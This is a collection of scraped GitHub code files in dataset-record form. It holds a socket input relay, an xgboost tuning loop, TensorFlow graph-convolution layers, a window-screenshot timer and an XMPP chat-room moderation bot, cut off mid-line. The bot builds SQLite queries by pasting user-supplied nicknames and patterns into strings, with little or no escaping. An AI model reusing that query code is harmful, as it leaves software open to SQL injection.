([sys.stdin],[],[]):\n\t\t\t#print(\"stuck 1\")\n\t\t\tuserCmd = sys.stdin.read(1)\n\t\t\t#print(\"stuck 2\")\n\t\t\tif userCmd:\n\t\t\t\t#print(\"stuck 3\")\n\t\t\t\tguestsocket.send(userCmd.encode(\"ascii\"))\n\t\n\t\t\t#print(\"stuck 4\")\n\t\ttry:\n\t\t\thostCmd = guestsocket.recv(4096).decode(\"utf-8\")\n\t\t\tprint(hostCmd)\n\t\texcept BlockingIOError:\n\t\t\tcontinue\n\t\n\t\t\t#print(\"stuck 5\")\nfinally:\n\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldSettings)\n","repo_name":"Insanebob169/CS419_endless_runner","sub_path":"guest_test.py","file_name":"guest_test.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22832645508","text":"#!/data1/anaconda3/bin/python\n#!encoding:utf-8\n\"\"\"\n遍历max_depth参数,方便调优\n\"\"\"\nimport time\nimport xgboost as xgb\nfrom Loger import Loger\nimport numpy as np\nimport sys\n\neta = 0.1\n\npath_data = \"./data/\"\nfile_col_names = \"./col_names.txt\"\nfile_train = path_data + \"train.csv\"\nfile_tests = path_data + \"test.csv\"\npath_model = '../data/model/'\nloger = Loger()\nlog = loger.log\n\ndef load_col_names():\n ret = []\n rf = open(file_col_names,'r')\n for line in rf.readlines():\n ret.append(line.strip().split()[1])\n log(\"#cols: %s\" % len(ret))\n rf.close()\n return ret\n \n# 正负样本准确率平均\ndef acc_avg(preds, dtrain):\n np_label = np.array(dtrain.get_label())\n num_pos = np_label.sum()\n np_pred_right = ((np.array(preds) >= 0.5) == np_label)\n accuracy_0 = (np_pred_right * (1-np_label)).sum() / (np_label.size - num_pos)\n accuracy_1 = (np_pred_right * np_label).sum() / num_pos\n accuracy_avg = 50 * (accuracy_0 + accuracy_1)\n return 'mAcc', round(accuracy_avg, 3)\ndef acc_neg(preds, dtrain):\n np_label = np.array(dtrain.get_label())\n num_pos = np_label.sum()\n np_pred_right = ((np.array(preds) >= 0.5) == np_label)\n accuracy_1 = 100. 
* (np_pred_right * np_label).sum() / num_pos\n return 'Acc+', accuracy_1\n\n# 计算全部、正、负样本中的准确率\ndef calc_accuracy(labels, preds, if_print=False):\n total = len(labels)\n assert len(preds) == total\n np_label = np.array(labels)\n num_pos = np_label.sum()\n np_pred_right = ((np.array(preds) >= 0.5) == np_label)\n\n accuracy_all = 100. * np_pred_right.sum() / total\n accuracy_1 = 100. * (np_pred_right * np_label).sum() / num_pos\n accuracy_0 = 100. * (np_pred_right * (1-np_label)).sum() / (total - num_pos)\n return accuracy_all, accuracy_1, accuracy_0\n\ndef load_DMatrix(file_name, col_names, s_name):\n log(\"load %s ...\" % file_name)\n dmatrix = xgb.DMatrix(file_name + \"?format=csv&label_column=0\", feature_names = col_names)\n num_1 = sum(dmatrix.get_label())\n num_0 = len(dmatrix.get_label()) - num_1\n log(\"# %s set: %s\" % (s_name, dmatrix.num_row()))\n log(\"# %s +: (%5.2f%%) %d\" % (s_name, 100. * num_1/dmatrix.num_row(), num_1))\n log(\"# %s -: (%5.2f%%) %d\" % (s_name, 100. * num_0/dmatrix.num_row(), num_0))\n log(\"# %s -/+: %.2f\" % (s_name, 1. * num_0 / num_1))\n return dmatrix\n\ndef output_predict(bst, dtrain, f_output):\n preds = bst.predict(dtrain)\n labels = dtrain.get_label()\n \"\"\"\n wf = open(f_output, 'w')\n for i in range(len(labels)):\n wf.write(\"%s\\t%s\\t%d\\n\" % (int(labels[i]), preds[i], int(preds[i]>0.5) == labels[i]))\n wf.close()\n wf = open(f_output, 'w')\n \"\"\"\n accuracy_all, accuracy_1, accuracy_0 = calc_accuracy(labels, preds)\n log(\" accuracy +: %.3f%%\" % accuracy_1)\n log(\" accuracy -: %.3f%%\" % accuracy_0)\n log(\" accuracy avg: %.3f%%\" % ((accuracy_1 + accuracy_0)/2))\n log(\" accuracy ALL: %.3f%%\" % accuracy_all)\n\ndef main():\n cols = load_col_names()\n dtrain = load_DMatrix(file_train, cols, 'train')\n dtests = load_DMatrix(file_tests, cols, 'tests')\n \n # 遍历max_depth 参数范围\n for depth in range(7, 14):\n iTrain(dtrain, dtests, depth, 50)\n\ndef iTrain(dtrain, dtests, max_depth, num_round):\n param = {'booster':'gbtree','max_depth':max_depth, 'eta':eta, 'silent':1, 'objective':'binary:logistic', 'nthread': 15}\n param['eval_metric'] = ['rmse', 'auc', 'error']\n param['scale_pos_weight'] = 2\n evallist = [(dtrain, 'N'), (dtests, 'E')]\n log(\"param:\\n\\t\" + str(param) + \"\\n\\tnum_round: \" + str(num_round))\n \n bst = xgb.train(param, dtrain, num_round, evallist, feval=acc_avg)\n loger.logu(\"train done.\")\n file_model = path_model + 'model.%s.%s' % (max_depth, num_round)\n file_fscore = file_model + \".score\"\n bst.save_model(file_model + '.dat')\n bst.dump_model(file_model + '.txt')\n \n list_score = sorted(bst.get_score(importance_type='gain').items(), key=lambda x: -x[1])\n with open(file_fscore, 'w') as wf:\n for k,v in list_score:\n wf.write(\"%12.5f\\t%s\\n\" % (v,k))\n \n log(\"predict train:\")\n output_predict(bst, dtrain, path_data + '/pred.train.txt.%s.%s' % (max_depth, num_round))\n log(\"predict test:\")\n output_predict(bst, dtests, path_data + '/pred.tests.txt.%s.%s' % (max_depth, num_round))\n\n \nif __name__ == \"__main__\":\n loger0 = Loger()\n loger0.log(\"begin...\")\n\n main()\n\n loger0.logu(\"done\")\n","repo_name":"schwt/common","sub_path":"xgboost/xgboost_train.loop.py","file_name":"xgboost_train.loop.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25752132100","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n###\n#Created on Wed Jul 29 10:07:22 2020\n\n#@author: aurelien\n###\n\n\nfrom inits 
import *\nimport tensorflow as tf\n\nflags = tf.compat.v1.flags\nFLAGS = flags.FLAGS\n# Dictionnaire des id de nos layers\n_LAYER_UIDS = {}\n\n\ndef get_layer_uid(layer_name=''):\n #Cette fonction permet d'assigner un nom unique à chaque layer#\n if layer_name not in _LAYER_UIDS:\n _LAYER_UIDS[layer_name] = 1\n return 1\n else:\n _LAYER_UIDS[layer_name] += 1\n return _LAYER_UIDS[layer_name]\n\ndef sparse_dropout(x, keep_prob, noise_shape):\n #Le dropout est utilisé afin de ne pas surentrainé notre réseau, on va perturber nous même l'apprentissage en fixant un pourcentage de poids à 0#\n random_tensor = keep_prob\n random_tensor += tf.random_uniform(noise_shape)\n dropout_mask = tf.cast(tf.floor(random_tensor), dtype=tf.bool)\n pre_out = tf.sparse_retain(x, dropout_mask)\n return pre_out * (1./keep_prob)\n\ndef dot(x, y, sparse=False):\n #cette fonction permet de multiplié deux matrices en utilisant la méthode la plus approprié suivant leur forme#\n if sparse:\n res = tf.sparse_tensor_dense_matmul(x, y)\n else:\n res = tf.matmul(x, y)\n return res\n \n\nclass Layer(object):\n\n #Un layer possède un nom qui définit la porté du layer, le logging permet de passer la représentation de notre layer sous forme d'histogramme sur 0/1.#\n \n def __init__(self, **kwargs):\n allowed_kwargs = {'name', 'logging'}\n for kwarg in kwargs.keys():\n assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg\n name = kwargs.get('name')\n if not name:\n layer = self.__class__.__name__.lower()\n name = layer + '_' + str(get_layer_uid(layer))\n self.name = name\n self.vars = {}\n logging = kwargs.get('logging', False)\n self.logging = logging\n self.sparse_inputs = False\n\n #La fonction call prend les entrées du layer et retourne les sorties# \n def _call(self, inputs):\n return inputs\n \n def __call__(self, inputs):\n with tf.name_scope(self.name):\n if self.logging and not self.sparse_inputs:\n tf.summary.histogram(self.name + '/inputs', inputs)\n outputs = self._call(inputs)\n if self.logging:\n tf.summary.histogram(self.name + '/outputs', outputs)\n return outputs \n\n def _log_vars(self):\n for var in self.vars:\n tf.summary.histogram(self.name + '/vars/' + var, self.vars[var])\n \nclass Dense(Layer):\n #Ici on déifnit un layer dense, #\n \n \n def __init__(self, input_dim, output_dim, placeholders, dropout=0., sparse_inputs=False,\n act=tf.nn.relu, bias=False, featureless=False, **kwargs):\n super(Dense, self).__init__(**kwargs)\n\n if dropout:\n self.dropout = placeholders['dropout']\n else:\n self.dropout = 0.\n\n self.act = act\n self.sparse_inputs = sparse_inputs\n self.featureless = featureless\n self.bias = bias\n\n self.num_features_nonzero = placeholders['num_features_nonzero']\n\n #on fixe les poids du layer grâce à l'initilisation de glorot et s'il y a des biais on les fixe sur zeros#\n\t\n\t\n with tf.variable_scope(self.name + '_vars'):\n self.vars['weights'] = glorot([input_dim, output_dim],\n name='weights')\n if self.bias:\n self.vars['bias'] = zeros([output_dim], name='bias')\n\t\n\t #Si l'affichage est sur on, on affiche toutes les données du layer#\n if self.logging:\n self._log_vars()\n \n\t\n def _call(self, inputs):\n \n \t#On prend x en valeur d'entrée\n x = inputs\n\n # On applique le dropout \n if self.sparse_inputs:\n x = sparse_dropout(x, 1-self.dropout, self.num_features_nonzero)\n else:\n x = tf.nn.dropout(x, 1-self.dropout)\n\n # On applique la pondération aux entrée du layer\n output = dot(x, self.vars['weights'], sparse=self.sparse_inputs)\n\n # On ajoute les biais 
\n if self.bias:\n output += self.vars['bias']\n\t\n\t# Enfin on retourne le tout\n return self.act(output)\n \n \nclass GraphConvolution(Layer):\n ###On définit la fonction pour créer un layer convolutionnel###\n \n def __init__(self, input_dim, output_dim, placeholders, dropout=0.,\n sparse_inputs=False, act=tf.nn.relu, bias=False,\n featureless=False, **kwargs):\n super(GraphConvolution, self).__init__(**kwargs)\n\n if dropout:\n self.dropout = placeholders['dropout']\n else:\n self.dropout = 0.\n\n self.act = act\n self.support = placeholders['support']\n self.sparse_inputs = sparse_inputs\n self.featureless = featureless\n self.bias = bias\n\n # helper variable for sparse dropout\n self.num_features_nonzero = placeholders['num_features_nonzero']\n\n with tf.variable_scope(self.name + '_vars'):\n for i in range(len(self.support)):\n self.vars['weights_' + str(i)] = glorot([input_dim, output_dim],\n name='weights_' + str(i))\n if self.bias:\n self.vars['bias'] = zeros([output_dim], name='bias')\n\n if self.logging:\n self._log_vars()\n\n def _call(self, inputs):\n \n #On prend les inputs X\n x = inputs\n\n # On applique un dropout sur X\n if self.sparse_inputs:\n x = sparse_dropout(x, 1-self.dropout, self.num_features_nonzero)\n else:\n x = tf.nn.dropout(x, 1-self.dropout)\n\n # Ici on applique une convolution \n supports = list()\n for i in range(len(self.support)):\n if not self.featureless:\n pre_sup = dot(x, self.vars['weights_' + str(i)],\n sparse=self.sparse_inputs)\n else:\n pre_sup = self.vars['weights_' + str(i)]\n support = dot(self.support[i], pre_sup, sparse=True)\n supports.append(support)\n output = tf.add_n(supports)\n\n # On ajoute les biais s'il y en a avant de retourner l'output qui passe par une fonction relu \n if self.bias:\n output += self.vars['bias']\n \n return self.act(output)\n \nif __name__=='__main__':\n pass\n\n\n","repo_name":"AurelienTTN/GCN","sub_path":"gcn/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34563334700","text":"import win32gui\r\nimport win32ui\r\nimport win32con\r\nfrom time import time\r\ne=[]\r\nf=time()\r\nfor i in range(35):\r\n a=time()\r\n b=win32ui.CreateDCFromHandle(win32gui.GetWindowDC(win32gui.FindWindow(None, 'example')))\r\n c=b.CreateCompatibleDC()\r\n d = win32ui.CreateBitmap()\r\n d.CreateCompatibleBitmap(b, 1920, 1080)\r\n c.SelectObject(d)\r\n c.BitBlt((0,0),(1920, 1080) , b, (0,0), win32con.SRCCOPY)\r\n d.SaveBitmapFile(c, 'file.bmp')\r\n e.append(time()-a)\r\nprint(time()-f)\r\ne.sort()\r\ninput(e)\r\n","repo_name":"frost-dream/clauth","sub_path":"New folder (2)/clauth - Copy - Copy.py","file_name":"clauth - Copy - Copy.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37011154060","text":"import sqlite3 as db\nimport re\nimport time\n\nAKICK_COMP_EXP = {}\nAMODER_COMP_EXP = {}\nAVISITOR_COMP_EXP = {}\nABAN_COMP_EXP = {}\n\ndef querymuc(dbpath,query):\n\tcursor,connection = None, None\n\ttry:\n\t\tconnection=db.connect(dbpath)\n\t\tcursor=connection.cursor()\n\t\tcursor.execute(query)\n\t\tresult=cursor.fetchall()\n\t\tconnection.commit()\n\t\tcursor.close()\n\t\tconnection.close()\n\t\treturn result\n\texcept:\n\t\tif cursor:\n\t\t\tcursor.close()\n\t\tif connection:\n\t\t\tconnection.commit()\n\t\t\tconnection.close()\n\t\treturn ''\n\ndef compile_re_patt(gch,amuc):\n\tqli = 
show_amuc(gch,amuc)\n\tqli = [list(li)[0] for li in qli]\n\t\n\tif qli != '':\n\t\tamucreli = ['^'+li+'$' for li in qli]\n\t\tamuc_comp_exp = r'|'.join(amucreli)\n\t\tif amuc_comp_exp:\n\t\t\tamuc_comp_exp = re.compile(amuc_comp_exp)\n\t\treturn amuc_comp_exp\n\telse:\n\t\treturn qli\n\ndef split_reason(parameters):\n\tnijirel = parameters.split('|', 1)\n\tsplited = ['','']\t\n\t\t\n\tif len(nijirel) == 1:\n\t\tsplited[0] = nijirel[0].strip()\n\t\tsplited[1] = ''\n\telif len(nijirel) == 2:\n\t\tsplited[0] = nijirel[0].strip()\n\t\tsplited[1] = nijirel[1].strip()\n\treturn splited\n\ndef muc_set_role(func,type,source,parameters):\n\tgroupchat = source[1]\n\t\n\tsparams = split_reason(parameters)\n\tnick = sparams[0]\n\treason = sparams[1]\n\t\n\tif check_jid(nick):\n\t\tnick = get_nick(groupchat, nick)\n\t\n\tif GROUPCHATS[groupchat].has_key(nick):\n\t\tif GROUPCHATS[groupchat][nick]['ishere'] == 1:\n\t\t\tresp = func(groupchat,nick,reason)\n\t\t\n\t\t\tif func.func_name == 'kick':\n\t\t\t\tdel_banned(groupchat,nick)\n\t\t\t\tdel GROUPCHATS[groupchat][nick]\n\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\telse:\n\t\treply(type, source, u'And then?')\n\ndef muc_set_aff(func,type,source,parameters):\n\tgroupchat = source[1]\n\t\n\tsparams = split_reason(parameters)\n\tnick_jid = sparams[0]\n\treason = sparams[1]\n\t\n\tif GROUPCHATS[groupchat].has_key(nick_jid):\n\t\tif GROUPCHATS[groupchat][nick_jid]['ishere'] == 1:\n\t\t\tif func.func_name == 'none' and reason == 'unban':\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\t\t\treturn\n\t\t\t\n\t\t\tresp = func(groupchat,nick_jid,reason)\n\t\t\n\t\t\tif func.func_name == 'ban':\n\t\t\t\tdel_banned(groupchat,nick_jid)\n\t\t\t\tdel GROUPCHATS[groupchat][nick_jid]\n\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\telse:\n\t\t\tif func.func_name == 'none' and reason == 'unban':\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\t\t\treturn\n\t\t\t\n\t\t\tjid = GROUPCHATS[groupchat][nick_jid]['jid'].split('/')[0]\n\t\t\tresp = func(groupchat,jid,reason)\n\t\t\t\n\t\t\tif func.func_name == 'ban':\n\t\t\t\tdel_banned(groupchat,nick_jid)\n\t\t\t\tdel GROUPCHATS[groupchat][nick_jid]\n\t\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\telif not check_jid(nick_jid):\n\t\tif func.func_name == 'none' and reason == 'unban':\n\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\t\treturn\n\t\t\n\t\tjid = get_jid(groupchat, nick_jid)\n\t\t\n\t\tif jid:\n\t\t\tresp = func(groupchat,jid,reason)\n\t\t\t\n\t\t\tif func.func_name == 'ban':\n\t\t\t\tdel_banned(groupchat,nick_jid)\n\t\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\telse:\n\t\t\treply(type, source, u'And, then??')\n\t\t\t\t\n\telse:\n\t\tresp = func(groupchat,nick_jid,reason)\n\t\t\t\n\t\tif resp:\n\t\t\treply(type, source, u'Done!')\n\t\telse:\n\t\t\treply(type, source, u'Unable to perform the operation!')\n\ndef del_banned(gch, nick):\n\tif not nick:\n\t\tnick = ''\n\t\n\tnick = nick.replace('\"','"')\n\tsql = 'DELETE FROM users WHERE nick=\"%s\";' % (nick)\n\tqres = querymuc('settings/'+gch+'/users.db',sql)\n\t\n\tif qres == []:\n\t\treturn True\n\ndef get_join_nick(gch, 
jid):\n\tnick = ''\n\t\n\tnickl = [li for li in GROUPCHATS[gch] if jid in GROUPCHATS[gch][li]['jid'] and GROUPCHATS[gch][li]['ishere'] == 1]\n\t\n\tif nickl:\n\t\tnick = nickl[-1]\n\t\t\n\treturn nick\t\t\n\t\t\ndef get_nick(gch, jid):\n\tjid = jid.replace('\"','"')\n\tsql = 'SELECT nick FROM users WHERE jid=\"%s\" ORDER BY ujoin;' % (jid)\n\tqres = querymuc('settings/'+gch+'/users.db',sql)\n\t\n\tif qres:\n\t\tnick = qres[-1][0]\n\t\treturn nick\n\ndef get_jid(gch, nick):\n\tnick = nick.replace('\"','"')\n\tsql = 'SELECT jid FROM users WHERE nick=\"%s\";' % (nick)\n\tqres = querymuc('settings/'+gch+'/users.db',sql)\n\t\n\tif qres:\n\t\tjid = qres[0][0]\n\t\treturn jid\n\ndef check_jid(jid):\n\tparse_jid = jid.split('@')\n\t\n\tif len(parse_jid) == 2:\n\t\tif parse_jid[0] and parse_jid[1]:\n\t\t\tif parse_jid[1].count('.') >= 1 and parse_jid[1].count('.') <= 3:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\t\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\ndef set_subject(groupchat, subject):\n\tmsg = xmpp.Message(groupchat)\n\tmsg.setType('groupchat')\n\tmsg.setTagData('subject',subject)\n\tresp = JCON.send(msg)\n\t\n\tif resp:\n\t\treturn True\n\ndef kick(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('kick'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tkick=query.addChild('item', {'nick':nick, 'role':'none'})\t\n\tkick.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef ban(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('ban'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tban=query.addChild('item', {'jid':nick_jid, 'affiliation':'outcast'})\t\t\n\telse:\n\t\tban=query.addChild('item', {'nick':nick_jid, 'affiliation':'outcast'})\n\t\n\tban.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef none(groupchat, nick_jid,reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('none'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tnone=query.addChild('item', {'jid':nick_jid, 'affiliation':'none'})\n\telse:\n\t\tnone=query.addChild('item', {'nick':nick_jid, 'affiliation':'none'})\n\t\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef visitor(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('voice'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tvisitor=query.addChild('item', {'nick':nick, 'role':'visitor'})\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef participant(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('part'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tparticipant=query.addChild('item', {'nick':nick, 'role':'participant'})\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\t\ndef member(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('member'+str(random.randrange(1000, 
9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tmember=query.addChild('item', {'jid':nick_jid, 'affiliation':'member'})\n\telse:\n\t\tmember=query.addChild('item', {'nick':nick_jid, 'affiliation':'member'})\n\t\n\tmember.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\t\ndef moderator(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('moder'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tmoderator=query.addChild('item', {'nick':nick, 'role':'moderator'})\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\ndef admin(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('admin'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tadmin=query.addChild('item', {'jid':nick_jid, 'affiliation':'admin'})\n\telse:\n\t\tadmin=query.addChild('item', {'nick':nick_jid, 'affiliation':'admin'})\n\t\n\tadmin.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\t\ndef owner(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('owner'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\towner=query.addChild('item', {'jid':nick_jid, 'affiliation':'owner'})\n\telse:\n\t\towner=query.addChild('item', {'nick':nick_jid, 'affiliation':'owner'})\n\t\n\towner.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\ndef save_amuc(gch,amuc,exp,reason=''):\n\texp = exp.replace(r'\"', r'"')\n\treason = reason.replace(r'\"', r'"')\n\t\n\tif amuc == 'akick' or amuc == 'aban':\n\t\tsql = 'INSERT INTO %s (exp,reason) VALUES (\"%s\",\"%s\");' % (amuc,exp.strip(),reason.strip())\n\telse:\n\t\tsql = 'INSERT INTO %s (exp) VALUES (\"%s\");' % (amuc,exp.strip())\n\t\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\t\ndef show_amuc(gch,amuc):\n\tif amuc == 'akick' or amuc == 'aban':\n\t\tsql = 'SELECT exp,reason FROM %s;' % (amuc)\n\telse:\n\t\tsql = 'SELECT exp FROM %s;' % (amuc)\n\t\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\ndef del_amuc(gch,amuc,amucre):\n\tsql = 'DELETE FROM %s WHERE exp=\"%s\";' % (amuc,amucre)\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\ndef clear_amuc(gch,amuc):\n\tsql = 'DELETE FROM '+amuc+';'\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\ndef set_amuc(gch,amfunc,cpatt,nick,jid):\n\tamucnifi = []\n\t\n\tif cpatt:\n\t\tamucnifi = cpatt.findall(nick)\n\t\t\n\tif amucnifi:\n\t\tif amfunc.func_name != 'moderator' and user_level(gch+'/'+nick,gch) <= 10:\n\t\t\tamfunc(gch, amucnifi[-1], '')\n\t\t\treturn\n\t\telif amfunc.func_name == 'moderator':\n\t\t\tamfunc(gch, amucnifi[-1], '')\n\t\t\treturn\n\t\t\n\tamucjifi = []\n\t\t\n\tif cpatt:\t\n\t\tamucjifi = cpatt.findall(jid)\n\t\n\tif amucjifi:\n\t\tif amfunc.func_name != 'ban': \n\t\t\tnick = get_join_nick(gch, amucjifi[-1])\n\t\t\t\n\t\t\tif nick:\n\t\t\t\tif amfunc.func_name != 'moderator' and user_level(gch+'/'+nick,gch) <= 10:\n\t\t\t\t\tamfunc(gch, nick, '')\n\t\t\t\t\treturn\n\t\t\t\telif 
amfunc.func_name == 'moderator':\n\t\t\t\t\tamfunc(gch, nick, '')\n\t\t\t\t\treturn\n\t\telse:\n\t\t\tif user_level(gch+'/'+nick,gch) <= 10:\n\t\t\t\tamfunc(gch, jid, '')\n\t\t\t\tdel GROUPCHATS[gch][nick]\n\ndef handler_amuc_join(groupchat, nick, aff, role):\n\tjid = get_true_jid(groupchat+'/'+nick)\n\t\t\n\tif AMODER_COMP_EXP[groupchat]:\n\t\tset_amuc(groupchat,moderator,AMODER_COMP_EXP[groupchat],nick,jid)\n\t\n\tif AVISITOR_COMP_EXP[groupchat] and aff == 'none':\n\t\tset_amuc(groupchat,visitor,AVISITOR_COMP_EXP[groupchat],nick,jid)\n\t\n\tif AKICK_COMP_EXP[groupchat] and aff == 'none':\n\t\tset_amuc(groupchat,kick,AKICK_COMP_EXP[groupchat],nick,jid)\n\t\n\tif ABAN_COMP_EXP[groupchat] and aff == 'none':\n\t\tset_amuc(groupchat,ban,ABAN_COMP_EXP[groupchat],nick,jid)\n\t\ndef handler_amuc_presence(prs):\n\tptype = prs.getType()\n\tgroupchat = prs.getFrom().getStripped()\n\tnick = prs.getFrom().getResource()\n\tjid=get_true_jid(groupchat+'/'+nick)\n\tscode = prs.getStatusCode()\n\n\tif scode == '303' and ptype == 'unavailable':\n\t\tnewnick = prs.getNick()\n\t\t\n\t\tif AMODER_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,moderator,AMODER_COMP_EXP[groupchat],newnick,jid)\n\t\t\n\t\tif AVISITOR_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,visitor,AVISITOR_COMP_EXP[groupchat],newnick,jid)\n\t\t\n\t\tif AKICK_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,kick,AKICK_COMP_EXP[groupchat],newnick,jid)\n\t\t\n\t\tif ABAN_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,ban,ABAN_COMP_EXP[groupchat],newnick,jid)\n\t\ndef get_amuc_state(gch):\n\tglobal AKICK_COMP_EXP\n\tglobal AMODER_COMP_EXP\n\tglobal AVISITOR_COMP_EXP\n\tglobal ABAN_COMP_EXP\n\t\n\tif not AKICK_COMP_EXP.has_key(gch):\n\t\tAKICK_COMP_EXP[gch] = ''\n\tif not AMODER_COMP_EXP.has_key(gch):\n\t\tAMODER_COMP_EXP[gch] = ''\n\tif not AVISITOR_COMP_EXP.has_key(gch):\n\t\tAVISITOR_COMP_EXP[gch] = ''\n\tif not ABAN_COMP_EXP.has_key(gch):\n\t\tABAN_COMP_EXP[gch] = ''\n\t\n\tif not os.path.exists('settings/'+gch+'/amuc.db'):\n\t\tsql = 'CREATE TABLE avisitor(id integer primary key autoincrement, exp varchar,unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\t\tsql = 'CREATE TABLE akick(id integer primary key autoincrement, exp varchar, reason varchar, unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\t\tsql = 'CREATE TABLE amoderator(id integer primary key autoincrement, exp varchar, unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\t\tsql = 'CREATE TABLE aban(id integer primary key autoincrement, exp varchar, reason varchar, unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\telse:\n\t\tAKICK_COMP_EXP[gch] = compile_re_patt(gch,'akick')\n\t\tAMODER_COMP_EXP[gch] = compile_re_patt(gch,'amoderator')\n\t\tAVISITOR_COMP_EXP[gch] = compile_re_patt(gch,'avisitor')\n\t\tABAN_COMP_EXP[gch] = compile_re_patt(gch,'aban')\n\ndef handler_akick(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal AKICK_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = 